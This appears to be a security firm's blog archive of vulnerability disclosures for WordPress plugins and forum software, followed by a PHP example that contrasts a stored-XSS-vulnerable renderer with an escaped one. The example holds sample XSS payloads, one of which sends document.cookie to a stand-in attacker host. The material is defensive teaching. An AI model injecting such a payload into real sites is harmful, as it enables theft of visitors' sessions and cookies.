During a routine research audit for our Sucuri Web Application Firewall, we discovered a cross-site scripting (XSS) vulnerability affecting 100,000+ users of the YITH WooCommerce Ajax Product Filter plugin. Current State of the Vulnerability This security bug was fixed in the 3.11.1 release. We are not aware of any exploit attempts currently using this vulnerability. […]
Tag Archives: Vulnerability Disclosure
Vulnerable Plugins: June 2020 Update
This is a mid-month update to our regular Monthly Vulnerability Digest, listing a number of new patches for disclosed vulnerabilities.

Plugin                    Vulnerability                  Patched Version   Installs
Elementor Page Builder    Authenticated Stored XSS       2.9.10            5,000,000
AdRotate                  Authenticated SQL Injection    5.8.4             40,000
Brizy – Page Builder      Improper Access Controls       1.0.126           60,000
Careerfy                  Unauthenticated XSS            3.9.0             5,000
SportsPress […]
OneTone Vulnerability Leads to JavaScript Cookie Hijacking
A vulnerability in the discontinued WordPress theme OneTone has been added to an ongoing campaign that is targeting vulnerable WordPress websites and causes malicious redirects through domains like ischeck[.]xyz. This specific wave uses the XSS vulnerability to inject malicious JavaScript and redirect visitors to the attacker’s landing page. The malware also detects and leverages existing […]
Authentication Bypass Vulnerability in InfiniteWP Client
An authentication bypass vulnerability affecting more than 300,000 InfiniteWP Client plugin users has recently been disclosed to the public. This plugin allows site owners to manage multiple websites from one central server using the InfiniteWP Server. Due to the nature of this plugin, this is a serious vulnerability that should be patched as soon as […]
Zero-Day RCE in vBulletin v5.0.0-v5.5.4
A new remote code execution (RCE) zero-day vulnerability was disclosed by an anonymous researcher on the Full Disclosure mailing list this past Monday. This vulnerability is extremely severe: it allows any website visitor to run PHP code and shell commands on the site's underlying server. Am I At Risk? At the time of writing this, […]
Dissecting the WordPress 5.2.3 Update
Last week, WordPress released version 5.2.3, a security and maintenance update that, as such, contained a number of security fixes. Part of our day-to-day work is to analyse these security releases, work out which security issues they fix, and produce a proof of concept for further internal testing. Based on our […]
Icegram Persistent Cross-Site Scripting
Icegram is a plugin that helps you collect email addresses for your newsletter. Other features include light-box popup offers, header action bars, toast notifications, and slide-in messengers. Versions 1.10.28.2 and lower are affected by a persistent cross-site scripting (XSS) vulnerability in the admin area. This plugin has over 40,000 installations, and any attacker with a subscriber account […]
Stored XSS in MyBB
The open source PHP forum software MyBB recently published a new update, version 1.8.21. This is a security release fixing a stored XSS vulnerability in the private messaging and post modules. What Are the Risks? Unpatched websites could allow bad actors to send booby-trapped posts or private messages to users. These would execute rogue JavaScript […]
OS Command Injection in WP-Database-Backup
On May 28th, a critical OS command injection vulnerability affecting the WP-Database-Backup plugin was disclosed to the public by the Wordfence team. This is a very nasty bug that made it possible for a bad actor to gain full control of affected websites; the plugin has over 70,000 reported active installs. Are You Affected? On April […]
Slimstat: Stored XSS from Visitors
The WordPress Slimstat plugin, which currently has over 100k installs, gathers analytics data for your WordPress website. It tracks information such as browser and operating system details and page visits so that you can optimize the site. Versions below 4.8.1 are affected by an unauthenticated stored XSS on the administrator […]
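The MyBB and Slimstat entries above describe the same bug class from two angles: text written by a low-privilege party (a forum member's private message, an anonymous visitor's browser details) is stored and later rendered, unencoded, into a page viewed by someone with more privilege. The PHP below is an added example, not code from Sucuri, MyBB or Slimstat; the stored rows and payloads are constructed, and treating the private-message body and the User-Agent header as the vectors is an assumption made for illustration, not a statement of how either real bug worked.

```php
<?php
// Added example: stored XSS from a low-privilege writer to a higher-privilege
// reader, shown as a vulnerable renderer next to its output-encoded fix.
// Nothing here is the plugins' own code; the data below is constructed.

// Constructed "database" rows. Which field a real plugin stored is an
// assumption; the point is that the text was never escaped on output.
$stored = [
    ['kind' => 'pm', 'from' => 'subscriber', 'text' => '<img src=x onerror="fetch(\'//attacker.example/?c=\'+document.cookie)">'],
    ['kind' => 'ua', 'from' => 'anonymous',  'text' => 'Mozilla/5.0 (compatible) <script>alert(1)</script>'],
    ['kind' => 'ua', 'from' => 'anonymous',  'text' => 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)'],
];

// Vulnerable: untrusted text is concatenated straight into the HTML that an
// administrator (or the message recipient) will load in their browser.
function render_vulnerable(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $r) {
        $html .= "<tr><td>{$r['from']}</td><td>{$r['text']}</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Hardened: every untrusted value is HTML-encoded at the point of output.
// ENT_QUOTES also encodes single quotes so the value is safe inside
// attributes; ENT_SUBSTITUTE avoids returning '' on invalid UTF-8, which
// would silently drop data. In WordPress, esc_html() serves the same role.
function esc(string $s): string {
    return htmlspecialchars($s, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_hardened(array $rows): string {
    $html = "<table>\n";
    foreach ($rows as $r) {
        $html .= '<tr><td>' . esc($r['from']) . '</td><td>' . esc($r['text']) . "</td></tr>\n";
    }
    return $html . "</table>\n";
}

// Cheap regression check for a test suite: a stored payload must never reach
// the page as live markup. Encoded output turns '<' into '&lt;', so a literal
// search for the raw payload only matches the vulnerable renderer.
function payload_survives(string $html, string $payload): bool {
    return strpos($html, $payload) !== false;
}

$payload = $stored[0]['text'];

echo "--- vulnerable ---\n", render_vulnerable($stored);
echo 'payload reaches the page: ', payload_survives(render_vulnerable($stored), $payload) ? "YES\n" : "no\n";

echo "--- hardened ---\n", render_hardened($stored);
echo 'payload reaches the page: ', payload_survives(render_hardened($stored), $payload) ? "YES\n" : "no\n";
```

Two practical notes: input-side filtering is not a fix for the visitor case, since a request header like User-Agent cannot be rejected without breaking analytics, so the encoding has to happen where the value is written into HTML; and the same stored value needs a different encoder if it is later placed inside a JavaScript string or a URL, so escape for the context you are emitting into rather than once on the way into the database.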